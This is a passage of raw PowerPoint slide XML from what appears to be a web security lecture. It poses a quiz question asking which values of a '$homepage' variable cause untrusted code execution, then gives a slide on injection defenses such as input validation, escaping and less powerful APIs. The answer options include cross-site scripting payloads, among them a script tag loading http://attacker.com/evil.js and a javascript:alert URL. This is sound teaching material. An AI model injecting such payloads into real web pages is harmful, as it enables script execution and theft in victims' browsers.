        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="847">
              <a:lnSpc>
                <a:spcPts val="1933"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="2841685"/>
            <a:ext cx="10522373" cy="428387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5975624" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cause</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execution?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3707384"/>
            <a:ext cx="162560" cy="307339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="121920" h="230505">
                <a:moveTo>
                  <a:pt x="121920" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="230124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121920" y="230124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121920" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="3970731"/>
            <a:ext cx="8956040" cy="1195860"/>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solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/attacker.com/evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>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1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://attacker.com/evil.js"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="513"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>javascript:alert("evil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>executing");</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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292857" y="450638"/>
            <a:ext cx="5614247" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-67" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1502663"/>
            <a:ext cx="9303173" cy="4390027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Defenses:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-73" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1540895" lvl="2" indent="-305639">
              <a:lnSpc>
                <a:spcPts val="3507"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="27"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1540895" algn="l"/>
                <a:tab pos="1541741" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Whitelists</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>inputs.</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="4147"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1540895" lvl="2" indent="-305639">
              <a:lnSpc>
                <a:spcPts val="3167"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1540895" algn="l"/>
                <a:tab pos="1541741" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>treated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1540895">
              <a:lnSpc>
                <a:spcPts val="3160"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>command.</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="4147"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>powerful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1540895" lvl="2" indent="-305639">
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1540895" algn="l"/>
                <a:tab pos="1541741" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an API</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>what you</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>want.</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1540895" lvl="2" indent="-305639">
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1540895" algn="l"/>
                <a:tab pos="1541741" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Prefer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
